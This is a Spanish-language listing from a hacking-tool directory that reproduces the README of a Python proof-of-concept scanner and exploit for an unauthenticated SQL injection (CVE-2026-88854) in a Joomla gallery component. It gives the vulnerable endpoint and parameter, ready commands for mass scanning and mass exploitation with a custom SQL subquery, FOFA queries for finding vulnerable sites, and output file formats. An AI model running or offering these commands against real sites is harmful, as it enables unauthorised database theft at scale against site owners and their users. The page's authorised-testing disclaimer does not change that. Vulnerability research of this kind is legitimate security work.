Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-88854 — Escáner PoC y exploit en Python 3 para CVE-2026-88854, una inyección SQL no autenticada en OrdaSoft Joomla Gallery, con modos de comprobación masiva y lectura de datos mediante EXTRACTVALUE. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-88854
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmurrez/cve-2026-88854

CVE-2026-88854

Escáner PoC y exploit en Python 3 para CVE-2026-88854, una inyección SQL no autenticada en OrdaSoft Joomla Gallery, con modos de comprobación masiva y lectura de datos mediante EXTRACTVALUE.

Ver Repositorio
hace 2h 59mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-88854 — Inyección SQL en OrdaSoft Joomla Gallery

Escáner/exploit PoC en Python 3 para CVE-2026-88854 en OrdaSoft OS Responsive Image Gallery para Joomla.

Componentecom_osgallery, com_osgallery_light
Afectados1.0.0 – 6.2.6
Corregido en6.2.7+
CVSS 4.09.3 (Crítico)
AutenticaciónNinguna (público mod_osgallery_search)
CWECWE-89

Resumen

showSearchResult() / showSearchResultAjax() leen textsearch / searchText mediante $input->getVar(), que no aplica un escape SQL adecuado. El valor se concatena en una cláusula LIKE. Los visitantes no autenticados pueden usar inyección de tipo UNION para leer el contenido de la base de datos.

Superficie de petición típica:

root@kitploit:~
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...

Las instalaciones heredadas pueden usar el nombre de tarea searhResult (error tipográfico).

Requisitos

  • Python 3.9+
  • pip install -r requirements.txt

Uso

root@kitploit:~
pip install -r requirements.txt

# Fingerprint + strict SQLi probe (error / time / EXTRACTVALUE)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# MySQL error-based read (default subquery: VERSION())
python poc.py -u https://target.example --mode exploit

python poc.py -u https://target.example --mode exploit \
  --subquery "SELECT DATABASE()"

# Mass exploit (writes leaks to exploited.txt, not hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
  --output exploit_results.jsonl --vuln-list exploited.txt

# Re-tier a prior mass check by manifest version (optional)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl

Opciones de CLI

Salida (mass check)

ArchivoContenido
cve_2026_88854_results.jsonlJSON por objetivo
hits.txtURLs candidatas (exploitable_candidate)

Valores comunes de status (check)

Auditoría posterior al escaneo (audit_scan.py)

Tras un check masivo, ejecute audit_scan.py para volver a obtener los manifiestos del administrador y dividir los objetivos:

La versión de la galería se lee del elemento <version> en administrator/components/com_osgallery/osgallery.xml, no del atributo extension version= de Joomla.

Limitaciones

  • El modo Exploit usa EXTRACTVALUE basado en errores de MySQL; MariaDB/Postgres, errores deshabilitados o WAF pueden no producir ninguna fuga incluso cuando el CVE aplica.
  • Las diferencias de longitud booleanas por sí solas no se tratan como SQLi confirmada (ModSecurity 406 causó falsos positivos en las pruebas).
  • Una versión del manifiesto ≤ 6.2.6 indica ventana de exposición, no SQLi explotable garantizada en todos los hosts.
  • Las instalaciones de Joomla en subdirectorio requieren la URL base correcta (p. ej. https://host/site).

FOFA / pistas de descubrimiento

root@kitploit:~
app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"

Estructura del repositorio

root@kitploit:~
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Las listas de objetivos locales y los artefactos de ejecución (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) están en .gitignore y no deben confirmarse.

Referencias

  • NVD — CVE-2026-88854
  • OrdaSoft Joomla Gallery

Legal

Solo para pruebas de seguridad autorizadas. Usted es responsable del cumplimiento de las leyes aplicables y las reglas del programa.

Descargar herramienta
OpciónDescripción
-u, --urlURL base de un único objetivo (instalaciones en subdirectorio: incluir la ruta)
--listArchivo de lista de objetivos (una URL por línea)
--modecheck o exploit
--subquerySQL dentro de EXTRACTVALUE (modo exploit, por defecto SELECT VERSION())
--threads, -jConcurrencia masiva (por defecto 20)
--timeoutSegundos de timeout HTTP (por defecto 20)
--proxyURL del proxy HTTP(S)
--outputResultados JSONL (por defecto cve_2026_88854_results.jsonl)
--vuln-listCheck → hits.txt; exploit → exploited.txt
--quiet, -qMenos salida de progreso
EstadoSignificado
sqli_confirmedSQLi basada en error/tiempo o fuga verificada de EXTRACTVALUE
likely_vulnerable_versionVersión del manifiesto ≤ 6.2.6 + endpoint de búsqueda
likely_componentGalería detectada, versión desconocida
boolean_inconclusiveSolo diferencia en longitud de respuesta (a menudo WAF); no se cuenta como confirmado
patched_versionVersión del manifiesto > 6.2.6
component_no_search_endpointComponente presente, tarea de búsqueda no accesible
no_componentcom_osgallery no detectado
ArchivoContenido
hits_version_lte_626.txtVersión de galería del manifiesto ≤ 6.2.6
hits_component_endpoint.txtGalería + endpoint, versión ilegible
hits_patched.txtManifiesto > 6.2.6
fofa_stale.txtSin componente (fila FOFA obsoleta)
cve_2026_88854_audit.jsonlJSONL enriquecido